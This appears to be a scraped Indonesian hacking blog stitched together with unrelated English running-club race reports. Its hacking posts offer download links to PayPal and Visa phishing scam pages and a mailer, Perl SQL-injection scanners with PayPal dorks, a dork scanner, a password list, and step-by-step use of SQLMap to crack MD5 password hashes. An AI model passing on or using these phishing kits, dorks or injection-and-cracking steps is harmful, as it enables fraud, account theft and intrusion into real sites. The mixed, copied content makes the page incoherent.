Sigit Chaw 17:05

Dibawah ini adalah link kumpulan password list

OTHER

Thursday 15 May 2014

IHA Dork Scanner

Sigit Chaw 12:32

Kali ini saya akan membagikan Tool Dork Scanner

Silahkan klik link di bawah untuk Download

IHA Dork Scanner

Salam dari saya..

OTHER

Sunday 11 May 2014

Heels and Wheels

Sigit Chaw 13:20

On June 1st, there is going to be a great 5K race and 1K charity walk taking place at Bingemans. It is for a cause that is near and dear to H+P-er, Jan de Visser. CLICK HERE for full details.

Jan's story:

On September 3rd, 2011 Jan de Visser went on a fateful bike ride that almost killed him. What was supposed to be an easy brick ride in preparation for the next week's Muskoka 70.3 ended after barely 5km in the passenger side door of a minivan. He sustained a broken neck, bleeding in the brain, a shattered cheekbone and eye socket, eye damage, and a broken collar bone. While the physical injuries were relatively quick to heal, the bleed in the brain caused a traumatic brain injury (TBI) which is still causing him problems: memory, planning and organization, and mood are all impacted, and in addition he now suffers from epilepsy. Being able to get back to running and later riding was a major factor in his recovery: it kept him sane, forces him to pay attention to his diet, and his training provides structure to his day. For the foreseeable future he will be a duathlete though instead of a triathlete.

More event details:

5K Race
1K walk
kid's dash
WELL-stocked swag bags and "insanely high-valued prizes."

If you want to race or volunteer, click here for more info.

2014 Baden Road Races

Sigit Chaw 10:27

H+P had an excellent experience at the 2014 Baden Road Races. There were a few new features in this re-branded version of the New Hamburg Classic Races. Our favourite addition to the already outstanding event was the hill challenge. In the middle of the 7-miler, there is a massive hill that is also timed. Run up the fastest, and you get a new pair of shoes!

Click here to read the WRS race recap.

Here's how we did as a team:

7-Miler Team Results

Luke was the first in for the team. He crushed the 7M course, finishing 2nd OA, winning his AG. This is his 4th race in a row with the team where he has stood on the OA podium!
Greg worked with Luke for much of the race. Finally kicking his training into gear, his fitness is starting to build. He finished 3rd OA, and won his AG!
Mike had an AWESOME race for the team. He forgot that he was supposed to be tired after the marathon from last weekend! He came in 3rd on the team, 5th OA, and averaged 4mins/K for the 7M course.
Dave Rutherford, coming back from his Achilles injury, was in next for the team. He finished in under 47 minutes, won his AG, and placed 8th OA.
Mailman came in right behind Dave. He finished in 47 minutes, and 9th OA, making him the 5th H+P-er in the top 10!
Nick Burt was unable to draft his nemesis in this race (Mailman), but still finished in just over 48 minutes. He still comfortably won his AG. The season series of Mailman vs. Nick now sits 2-1 in Aaron's favour.
Jessica was the 1st woman in for the team. She ran very strong, finishing 2nd OA for females, and winning the hill challenge!
Payton was our next female to finish the 7M. She ran a very strong race of just over 53 minutes, placing 2nd in her AG and 6th OA.
Will hammered a great 7M, finishing 2nd in his category.
Cari also had an awesome race, cruising in with a time of just over 1:10!

5K Team Results

Coach Sean won the race with a time of 17:20
Friend of H+P, Catherine, had an awesome return to action after 6 months away form racing. She won the race in 21-minutes low.
Kailey had an outstanding race for the team. After being away from running for over 6 months with injury woes, she crushed the 5K, finishing 2nd OA, 1sec behind Catherine,
Next in for the team was Holden. He had a great race, finishing in well under 25 minutes. Pretty darn good for a 10-year-old!
Ed was in next for the team. He ran a very strong 25:05, placing just inside the top 30.
Maria had an awesome race, coming in just over 30 minutes and winning her category!

Special thanks:

A HUGE thanks goes to Daniel Cook. He got up before 5am, did his long run, and THEN made the trip out to cheer on the team!
Also, a big thanks goes to Brendan who came out to cheer people on and take pictures at the base of the climb.

You guys made the race experience better for everybody! Way to represent H+P!

Wednesday 7 May 2014

Penetration Test

Sigit Chaw 18:38

Penetration test adalah suatu metode yang digunakan untuk mencari kelemahan dari suatu system atau jaringan. Tujuan dari dilakukannya penetration testing ini adalah untuk mencoba efektifitas dari suatu system keamanan yang telah diimplementasikan pada suatu system tertentu, dan kemudian menemukan kelemahan dari system keamanan itu serta menemukan kemungkinan masih adanya celah-celah kemanan yang tertinggal atau tidak terproteksi oleh system keamanan yang telah diimplementasikan tersebut.

Ada 2 (dua) model pelaksanaan penetration testing, yaitu flaw hypothesis model dan attack tree model. Flaw hypothesis model adalah suatu model penetration testing dimana sebelum dilakukan testing, tester mengajukan hipotesa-hipotesa kemungkinan kelemahan dari system yang akan ditesnya tersebut. Testing model seperti ini biasanya dilakukan untuk lingkungan system yang telah dikenal sebelumya, sehingga tester dapat memperkirakan kelemahan dari system tersebut.

Testing model yang kedua adalah attack tree model. Testing model ini dilakukan untuk suatu system yang lingkungannya belum pernah dikenal sebelumnya. Karena tidak mengenal lingkungan system ini sebelumnya, maka dilakukanlah pengecekan system secara keseluruhan, tidak spesifik seperti testing model yang sebelumnya. Tentunya, karena testing model ini dilakukan secara menyeluruh, maka waktu yang diperlukanpun lebih banyak bila dibandingkan dengan metode testing yang sebelumnya.

Ok semoga bermanfaat

OTHER

Pengertian Web Vulnerabilities

Sigit Chaw 18:36

Web vulnerabilities adalah celah-celah dari sistem keamanan web yang memungkinkan bagi seorang hacker ataupun cracker untuk menembus sistem keamanan dari web tersebut. Keberadaan celah-celah keamanan ini bisa disebabkan oleh banyak hal. Untuk suatu web application yang tidak mengimplementasikan suatu sistem keamanan dalam sistemnya, maka sudah jelas akan meninggalkan celah besar yang bisa dimanfaatkan oleh hacker maupun cracker untuk menembusnya. Sedangkan untuk suatu web yang sudah memiliki sistem keamanan di dalamnya, celah ini bisa saja muncul karena terlewatnya satu sisi keamanan dari web tersebut yang tidak diperhatikan sebelumnya saat perancangan sistem keamanan, ataupun bisa juga dikarenakan meningkatnya kemampuan seorang hacker ataupun cracker untuk menembus sistem keamanan suatu web.

Gambar dibawah adalah System serangan seorang hacker

Ok semoga anda lebih teliti lagi dalam penanganan website anda.

OTHER

Devinisi Hacker dan Cracker

Sigit Chaw 18:34

Sedikit penjelasan mengenai hacker dan cracker :

HACKER ialah seseorang yang memiliki ketertarikan tinggi terhadap berbagai hal yang terkait dengan isu menegnai celah-celah keamanan dalam suatu sistem komputer, mempelajarinya, membagi apa yang sudah dipelajarinya tersebut kepada siapa saja, dan tidak melakukan sesuatu hal yang mengakibatkan kerusakan, sehingga tidak membawa kerugian bagi orang lain.

Sedangkan CRACKER ialah seseorang yang memanfaatkan celah keamanan yang dimiliki suatu sistem, untuk kemudian menembus ke dalam sistem melalui celah tersebut, kemudian melakukan hal-hal yang dapat merusak database sistem yang ditembusnya, mengambil informasi penting yang ada di dalamnya, ataupun memodifikasi informasi yang ada di dalam database tersebut, sehingga membawa dampak kerugian bagi orang lain.

Target serangan seorang cracker ialah electronic assets. Electronic assets merupakan suatu hal yang sangat berarti baik bagi seseorang, bagi suatu perusahaan, ataupun instansi lain yang memanfaatkan suatu sistem jaringan komputer, dimana electronic assets ini tersimpan dalam bentuk kumpulan data dan program. Apabila suatu serangan berhasil dilakukan terhadap suatu perusahaan, maka berbagai macam kerugian akan menimpa perusahaan tersebut. Kerugian tersebut bisa berupa hilangnya pendapatan perusahaan karena kegagalan transaksi yang diakibatkan oleh website downtime, butuhnya alokasi dana yang bisa menjadi sangat besar untuk memperbaiki kerusakan sistem, dan yang tentunya akan menghilangkan kepercayaan dan reputasi perusahaan dimata konsumen.

Salam dari saya..semoga ente tidak mengartikan HACKER adalah orang yang selalu jahat

OTHER

Cracking MD5 Hash di SQLMAP

Sigit Chaw 11:12

ok langsung saja disimak.
Pada SQLMap terdapat perintah otomatis untuk mengcrack password yg berupa md5 Hash. jika password tersebut berupa md5 secara otomatis akan muncul perintah :

" do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] "
disini ente bisa ketik y dan enter.

nanti akan muncul lagi perintah :

" do you want to crack them via a dictionary-based attack? [Y/n/q] " ente klik saja y dan enter.

Jika muncul lagi perintah :
" what dictionary do you want to use?
[1] default dictionary file 'C:\sqlmap\txt\wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> "
langsung enter saja.

Dan terakhir muncul perintah :
" do you want to use common password suffixes? (slow!) [y/N] "
ente bisa ketik y untuk proses cracking password secara lambat dan bisa pilih n untuk proses cracking password secara cepat. namun untuk hasil akurat pilih saja y lambat namun passti. tapi ingat, tidak semua password bisa ketemu hasilnya untuk jelasnya lihat gambar

SQLMAP

Monday 5 May 2014

SQLI Scanner [Perl Script]

Sigit Chaw 16:45

Dibawah ini adalah sqli untuk mencari dork dan target vuln..

cara menggunakan.
instal active perl dan strawberry kiss, dan kemudian copas script nya trus simpan dengan eksistensi pl.. EX: sqli.pl dan simpan di drive C

Perl--SQLI Scanner

Peerl Sql Injector

Perl Dork Searcher

Note: untuk menggunakan Perl silahkan chat dengan klik tanda FB di Pojok Atas..

Dan saya kasih dork Paypal juga sebagai Bonus

Paypal Dork

Full Dork SQLI

Salam dari saya, semoga bermanfaat Perl

[Phising] ScamPage Paypal & Visa

Sigit Chaw 16:37

Ok kali ini saya akan membagi script untuk phising akun paypal,,monggoh scriptnya di Download.

silahkan di sedot,,
http://cur.lv/9jjfx ( paypal scam page 1 )
http://cur.lv/9jjg8 (paypal scam page 2 )
http://cur.lv/9jjgj ( paypal scam page 3 )
http://cur.lv/9jjhr ( scam page visa )
http://cur.lv/9jjo3 ( mailer inbox )

Sekian dari saya..semoga bermanfaaat. OTHER

Sunday 4 May 2014

May 3rd-4th, 2014

Sigit Chaw 16:39

There wasn't a specific race targeted as a team this weekend...but there were still plenty of H+P-ers in action in a variety of races. Here is how we did:

Mississauga Half:

Holger Kleinke has ANOTHER PB, coming in with a time of 1:26:14 (4th in AG)

Mississauga Full:

Mike Piazza battled hard and finished with a final time 3:11:22. This time was good enough for 2nd in his AG!

Mississauga 10k:

Rob Brouillette ran another very sold 10K. He finished with a time of 33:44, winning his AG and placing 4th OA.

Half Marathon in Vermont:

Chris Goldsworthy crushed his half with a new PB, hitting 1:25 low!

Goodlife Half:

Pat had a massive PB, running 1:25! This was good enough to place him 4th out of over 200 runners in his AG!

Katelyn also had an amazing result. She wanted to break 2 hours...and she did that by over 10 minutes, coming in with a time of 1:49!

Goodlife Full:
Tracey finished with a VERY strong time of 3:46! Nice work!

Mudpuppy 3 and 5K

New H+P-er, Nicole Green had an awesome race. After taking some time away from running, she still managed an excellent time, running 23-low!

Luke and his little future H+Pers had awesome races. Here's what Luke had to say:

Taters ran his first ever 3K, in 15:50 and came in 20/148 in AG 5-9 (not bad given he's only 6) and Holden ran his 2nd ever 5K in a good time of 23:21 and came in 13/46 in AG 10-14 (and he's only 10). Good results for a cool and windy day!

2014 Waterloo Marathon

Sigit Chaw 16:14

Less than 24 hours after we raced the ENDURrace 8K the team was back in action trying to conquer the 2014 Waterloo Half and Full Marathon.

We were treated to perfect race conditions, and an overall outstanding race experience. Here is how we did as a team:

Half Marathon

Luke had an awesome race. Despite just racing the 8K the night before, he still manged to run under 1:24 and finish 3rd OA!

Coach Dyce was in next for the team. Despite limitted training because of travelling, he still pulled off a 1:26 half and placed 6th OA.

Adam Dixon had an outstanding race. He had a massive PB, running 1:29, and just cracked the top-10 OA!

Vicki, like Luke, had just raced the 8K the night before. Despite that, she still crushed a 1:41minute PB, bringing her in 11th OA!

Will had an awesome half. Running much of the race by himself, he still finished with a very respectable time just over 2:10.

Also we have to say congrats to Ed, who trained with us last summer, on his OA win!

Full Marathon

We only had ONE H+Per in the full. Despite just racing a 50K the day before, Steve still crushed a sub 3:30 marathon, placing him comfortably in the top 15 OA!

Friday 2 May 2014

2014 H+P ENDURrace 8K and Combined

Sigit Chaw 11:41

It's hard to believe that yet another ENDURrace has come and gone. Two weeks ago we had an amazing experience at the ENDURrace 5K, with outstanding team results. It was going to be tough to top that effort, but we gave it out best shot.

Also, thanks again to Julie from the WRS for the great photography!

Here is how we did in the 2014 ENDURrace 8K:

8K Team Results:

As a team, we had better than anticipated result! Despite missing many of our key members, we still managed to have the top 4 finishers in the race overall, and the 2nd and 5th place females overall. Our open team finished with an outstanding average time of 30:34! RESULTS.

Individual 8K Results CLICK:

Brendan Hancock had an excellent race. Running alone for the duration of the 8K, he managed to take 1.5mins of his 8K time from Feb, running a mid-28, and winning the race OA.

Luke Ehgoetz had yet another awesome performance. He came in second overall, well under 30 minutes, and first in his AG.

Nick Burt was the next runner to come in. He completed the podium sweep for H+P, finishing in 3rd place after just barely edging out Aaron Mailman in an epic sprint finish.

Aaron Mailman came in next with a huge PB of 30:44, good enough for 4th OA and 1st in his AG.

Jessica was next for the team and our first female. She had an excellent performance, finishing in 33-low, and placing 2nd OA for females!

Vicki was our second female across the finish line. She has yet another PB, and handily won her AG!

Dave Rutherford showed true determination and grit. Doing nothing but recovering from injury and run walking over the last 2 months, he had a great, controlled effort. While it was supposed to be a rehab run, he still manged to walk away with a 33 minute 8K that was good enough for the AG win!

Daniel Cook had an awesome first H+P race. He had a massive PB, and placed first in his category!

Cari also had an awesome race. She had a huge PB, coming in well under 46 minutes!

Shantell had a great return to action as well with the team! As did Jeremy Tracey. The momentum is starting to build with both of them again!

Combined Results RESULTS:

With so many runners having run both races, it was exciting to see how we stacked up once the 5K and 8K times were combined. Here is how it looked for the team:

Luke WON with a combined time of just under 48 minutes
Mailman was 2nd OA as be banked more than enough time in the 5K to beat Nick with the combined time
Nick battled back from a tough post-exam 5K, making up time on the 2nd and 3rd place runners in the 8K. He ended up finishing only seconds off the podium, bringing him in 4th place OA
Vicki took care of things in the women's race, winning the combined title in her AG in a great time of well under 1 hour
Daniel Cook finished strong with a combined time of 1 hour which got him the win in his category
Cari came in top 10 in her AG when her two PB's were combined!

Sunday 25 May 2014

Wednesday 21 May 2014

Friday 16 May 2014

Thursday 15 May 2014

Sunday 11 May 2014

Wednesday 7 May 2014

Monday 5 May 2014

Sunday 4 May 2014

Friday 2 May 2014

Labels

Advertisement

Blog Archive

Blog Archive

Labels

Labels

Popular Posts

Pages

About Me

Pages - Menu

Popular Posts

Recent Posts

Posts

Contact Form